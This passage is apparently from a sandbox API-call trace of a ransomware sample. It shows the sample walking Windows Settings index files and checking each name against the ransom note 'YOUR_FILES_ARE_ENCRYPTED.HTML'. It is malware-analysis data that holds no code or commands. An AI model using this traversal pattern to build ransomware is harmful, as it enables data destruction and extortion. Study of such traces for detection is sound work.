PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_Magnifier_IsEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.618] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17ac4b94, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x17ac4b94, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x23a287a5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x584, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Accessibility_Magnifier_IsFollowInsertPointEnabled.settingcontent-ms", cAlternateFileName="AA8CB1~1.SET")) returned 1 [0121.618] StrStrIW (lpFirst="AAA_SystemSettings_Accessibility_Magnifier_IsFollowInsertPointEnabled.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.618] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Magnifier_IsFollowInsertPointEnabled.settingcontent-ms") returned 214 [0121.618] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_Magnifier_IsFollowInsertPointEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.618] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.618] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_Magnifier_IsFollowInsertPointEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.618] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x194b2528, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x194b2528, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x23969bec, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x575, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Accessibility_Magnifier_IsFollowKeyFocusEnabled.settingcontent-ms", cAlternateFileName="AAA651~1.SET")) returned 1 [0121.618] StrStrIW (lpFirst="AAA_SystemSettings_Accessibility_Magnifier_IsFollowKeyFocusEnabled.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.618] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Magnifier_IsFollowKeyFocusEnabled.settingcontent-ms") returned 211 [0121.618] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_Magnifier_IsFollowKeyFocusEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.618] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.618] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_Magnifier_IsFollowKeyFocusEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.618] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x195e37f6, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x195e37f6, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x23969bec, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x566, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Accessibility_Magnifier_IsInversionColorEnabled.settingcontent-ms", cAlternateFileName="AABD4E~1.SET")) returned 1 [0121.620] StrStrIW (lpFirst="AAA_SystemSettings_Accessibility_Magnifier_IsInversionColorEnabled.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.620] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Magnifier_IsInversionColorEnabled.settingcontent-ms") returned 211 [0121.620] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_Magnifier_IsInversionColorEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.620] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.620] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_Magnifier_IsInversionColorEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.620] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1986bebc, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1986bebc, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x234329b1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x514, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Accessibility_MouseCursorColor.settingcontent-ms", cAlternateFileName="AA8E91~1.SET")) returned 1 [0121.620] StrStrIW (lpFirst="AAA_SystemSettings_Accessibility_MouseCursorColor.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.620] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_MouseCursorColor.settingcontent-ms") returned 194 [0121.620] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_MouseCursorColor.settingcontent-ms") returned=".settingcontent-ms" [0121.620] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.620] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_MouseCursorColor.settingcontent-ms") returned=".settingcontent-ms" [0121.620] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a752af4, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1a752af4, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x23a9aeb1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x50e, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Accessibility_MouseCursorSize.settingcontent-ms", cAlternateFileName="AAD5FB~1.SET")) returned 1 [0121.620] StrStrIW (lpFirst="AAA_SystemSettings_Accessibility_MouseCursorSize.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.620] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_MouseCursorSize.settingcontent-ms") returned 193 [0121.620] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_MouseCursorSize.settingcontent-ms") returned=".settingcontent-ms" [0121.620] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.620] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_MouseCursorSize.settingcontent-ms") returned=".settingcontent-ms" [0121.620] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b174b28, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b174b28, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x23a74c5a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x546, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Accessibility_Narrator_IsAutoStartEnabled.settingcontent-ms", cAlternateFileName="AADFD0~1.SET")) returned 1 [0121.620] StrStrIW (lpFirst="AAA_SystemSettings_Accessibility_Narrator_IsAutoStartEnabled.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.620] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsAutoStartEnabled.settingcontent-ms") returned 205 [0121.620] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_Narrator_IsAutoStartEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.620] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.620] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_Narrator_IsAutoStartEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.620] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ba658c7, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1ba658c7, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x23a4ea03, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x54b, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Accessibility_Narrator_IsDuckAudioEnabled.settingcontent-ms", cAlternateFileName="AAFBF6~1.SET")) returned 1 [0121.620] StrStrIW (lpFirst="AAA_SystemSettings_Accessibility_Narrator_IsDuckAudioEnabled.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.620] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsDuckAudioEnabled.settingcontent-ms") returned 205 [0121.620] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_Narrator_IsDuckAudioEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.620] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.620] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_Narrator_IsDuckAudioEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.620] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1bf0409b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1bf0409b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x23a0254b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x55f, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Accessibility_Narrator_IsEchoCharacterEnabled.settingcontent-ms", cAlternateFileName="AA0EB6~1.SET")) returned 1 [0121.620] StrStrIW (lpFirst="AAA_SystemSettings_Accessibility_Narrator_IsEchoCharacterEnabled.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.621] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsEchoCharacterEnabled.settingcontent-ms") returned 209 [0121.621] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_Narrator_IsEchoCharacterEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.621] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.621] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_Narrator_IsEchoCharacterEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.621] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68ad15e9, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x68ad15e9, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x2340c766, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x546, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Accessibility_Narrator_IsEchoWordEnabled.settingcontent-ms", cAlternateFileName="AA16CC~1.SET")) returned 1 [0121.621] StrStrIW (lpFirst="AAA_SystemSettings_Accessibility_Narrator_IsEchoWordEnabled.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.621] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsEchoWordEnabled.settingcontent-ms") returned 204 [0121.621] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_Narrator_IsEchoWordEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.621] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.621] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_Narrator_IsEchoWordEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.621] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68c4ee17, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x68c4ee17, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x2398fe3f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x519, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Accessibility_Narrator_IsEnabled.settingcontent-ms", cAlternateFileName="AAD6FB~1.SET")) returned 1 [0121.621] StrStrIW (lpFirst="AAA_SystemSettings_Accessibility_Narrator_IsEnabled.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.621] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsEnabled.settingcontent-ms") returned 196 [0121.621] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_Narrator_IsEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.621] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.621] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_Narrator_IsEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.621] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68f96122, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x68f96122, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x23458c07, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x55b, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Accessibility_Narrator_IsFastKeyEntryEnabled.settingcontent-ms", cAlternateFileName="AAFD0D~1.SET")) returned 1 [0121.621] StrStrIW (lpFirst="AAA_SystemSettings_Accessibility_Narrator_IsFastKeyEntryEnabled.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.621] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsFastKeyEntryEnabled.settingcontent-ms") returned 208 [0121.621] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_Narrator_IsFastKeyEntryEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.621] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.621] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_Narrator_IsFastKeyEntryEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.621] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6915b22f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6915b22f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x239b6099, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x56a, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Accessibility_Narrator_IsFollowInsertionEnabled.settingcontent-ms", cAlternateFileName="AA4EF2~1.SET")) returned 1 [0121.621] StrStrIW (lpFirst="AAA_SystemSettings_Accessibility_Narrator_IsFollowInsertionEnabled.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.621] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsFollowInsertionEnabled.settingcontent-ms") returned 211 [0121.621] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_Narrator_IsFollowInsertionEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.621] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.621] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_Narrator_IsFollowInsertionEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.621] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x695f9eee, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x695f9eee, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x239dc2f0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x56a, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Accessibility_Narrator_IsHighlightCursorEnabled.settingcontent-ms", cAlternateFileName="AAB22F~1.SET")) returned 1 [0121.621] StrStrIW (lpFirst="AAA_SystemSettings_Accessibility_Narrator_IsHighlightCursorEnabled.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.621] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsHighlightCursorEnabled.settingcontent-ms") returned 211 [0121.621] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_Narrator_IsHighlightCursorEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.621] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.621] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_Narrator_IsHighlightCursorEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.621] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69941380, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x69941380, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x233e650b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x55f, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Accessibility_Narrator_IsPlayAudioCuesEnabled.settingcontent-ms", cAlternateFileName="AA0FB5~1.SET")) returned 1 [0121.622] StrStrIW (lpFirst="AAA_SystemSettings_Accessibility_Narrator_IsPlayAudioCuesEnabled.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.622] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsPlayAudioCuesEnabled.settingcontent-ms") returned 209 [0121.622] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_Narrator_IsPlayAudioCuesEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.622] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.622] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_Narrator_IsPlayAudioCuesEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.622] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a4f01a8, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6a4f01a8, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x23a4ea03, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x54b, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Accessibility_Narrator_IsReadHintsEnabled.settingcontent-ms", cAlternateFileName="AA29E2~1.SET")) returned 1 [0121.622] StrStrIW (lpFirst="AAA_SystemSettings_Accessibility_Narrator_IsReadHintsEnabled.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.622] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsReadHintsEnabled.settingcontent-ms") returned 205 [0121.622] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_Narrator_IsReadHintsEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.622] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.622] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_Narrator_IsReadHintsEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.622] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ad221a4, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6ad221a4, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x23a74c5a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x528, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Accessibility_Narrator_SpeechPitch.settingcontent-ms", cAlternateFileName="AA3E47~1.SET")) returned 1 [0121.622] StrStrIW (lpFirst="AAA_SystemSettings_Accessibility_Narrator_SpeechPitch.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.622] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_SpeechPitch.settingcontent-ms") returned 198 [0121.622] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_Narrator_SpeechPitch.settingcontent-ms") returned=".settingcontent-ms" [0121.622] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.622] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_Narrator_SpeechPitch.settingcontent-ms") returned=".settingcontent-ms" [0121.624] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b0b5b24, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6b0b5b24, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x2398fe3f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x528, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Accessibility_Narrator_SpeechSpeed.settingcontent-ms", cAlternateFileName="AA114E~1.SET")) returned 1 [0121.625] StrStrIW (lpFirst="AAA_SystemSettings_Accessibility_Narrator_SpeechSpeed.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.625] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_SpeechSpeed.settingcontent-ms") returned 198 [0121.625] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_Narrator_SpeechSpeed.settingcontent-ms") returned=".settingcontent-ms" [0121.625] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.625] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_Narrator_SpeechSpeed.settingcontent-ms") returned=".settingcontent-ms" [0121.625] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b2cbc78, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6b2cbc78, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x23a4ea03, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x52d, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Accessibility_Narrator_SpeechVoices.settingcontent-ms", cAlternateFileName="AA692E~1.SET")) returned 1 [0121.625] StrStrIW (lpFirst="AAA_SystemSettings_Accessibility_Narrator_SpeechVoices.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.625] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: 